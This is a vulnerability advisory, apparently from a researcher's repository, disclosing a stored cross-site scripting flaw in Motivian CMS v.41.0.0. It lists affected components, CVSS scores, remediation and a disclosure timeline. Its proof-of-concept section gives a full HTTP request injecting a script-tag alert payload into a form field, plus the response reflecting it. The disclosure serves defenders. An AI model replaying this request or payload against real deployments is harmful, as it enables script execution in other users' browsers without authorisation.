# CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS
This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0.

- CVE-2025-29094: Multiple Stored Cross-Site Scripting (XSS)

This vulnerability was reported to the vendor in accordance with responsible disclosure practices, and to MITRE, which assigned a temporary CVE ID. The details are being made public following the expiration of the 45-day disclosure period.


## General Information

- **Title:** Motivian Stored Cross Site Scripting (XSS)
- **Vulnerability Type:** Stored XSS
- **Vendor of Product:** Motivian
- **Product:** Motivian Content Management System
- **Affected Version:** Motivian CMS v.41.0.0
- **Affected Components:** `Marketing/Forms`, `Marketing/Offers`, `Content/Pages`
- **Attack Vector:** Remote
- **Impact:** Arbitrary JavaScript execution in victim's browser
- **Severity:** High
- **CVSSv3 score:** 7.6
- **CVSSv3 vector:** CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
- **Severity by CISA-ADP:** Medium
- **CVSSv3 score by CISA-ADP:** 6.1
- **CVSSv3 vector by CISA-ADP:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- **Found:** 2025-01-29
- **By:** Francesco Marcuccio
- **Status:** Reported to vendor on April 7, 2025 - No response/fix received by May 22, 2025


### Description

Cross Site Scripting vulnerability in Motivian Content Mangment System v.41.0.0 allows a remote attacker to execute arbitrary code via the `Marketing/Forms`, `Marketing/Offers` and `Content/Pages` components. The vulnerability was exploited by injecting malicious JavaScript code into various fields, including the title in `Marketing/Form` and `Marketing/Offers`, and the *header script* field in `Content/Pages`


### Proof Of Concept

The vulnerability can be exploited through various fields across different components. For demonstration purposes, the following proof-of-concept focuses on a specific scenario:

1. Navigate to the `Marketing/Forms` section and create a new form element.
2. Insert a malicious script into the *Name* field and save the form.

Below is the full transcript of the HTTP requests and responses used to demonstrate the issue:


#### _Burp Request_

```http title:BurpRequest 
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=&currentPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]
```

#### _Burp Response_

```http title:BurpResponse 
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10">&nbsp;</td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd">&nbsp;</td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]
```

### Remediation

Sanitize all user input and escape output before rendering. Implement CSP (Content Security Policy) header to mitigate XSS risks.


## Disclosure Timeline

| Date       | Action                                |
| ---------- | ------------------------------------- |
| 2025-02-06 | CVE ID request (CNA: MITRE)           |
| 2025-04-02 | CVE ID assignment                     |
| 2025-04-07 | Vulnerabilities reported to vendor    |
| 2025-05-31 | Public disclosure after expiration of the 45-day disclosure period (54 days total) |
| 2025-06-04 | Official registration and entry in the MITRE database and NIST/NVD portal |

## Credit
- Discovered and responsibly disclosed by:  
[**Francesco Marcuccio**](https://www.linkedin.com/in/francesco-marcuccio-0433b9218)  
CyberSecurity Consultant, Penetration Tester

- MITRE discoverer attribution listed as:  
[**Francesco Marcuccio**](https://www.linkedin.com/in/francesco-marcuccio-0433b9218)  
CyberSecurity Consultant, Penetration Tester

## Links
Reference links: [**MITRE**](https://www.cve.org/CVERecord?id=CVE-2025-29094)  [**NIST**](https://nvd.nist.gov/vuln/detail/CVE-2025-29094) 


## Status
This CVE ID is officially in PUBLISHED status. It will be updated with CVSS score by NIST, after analysis.
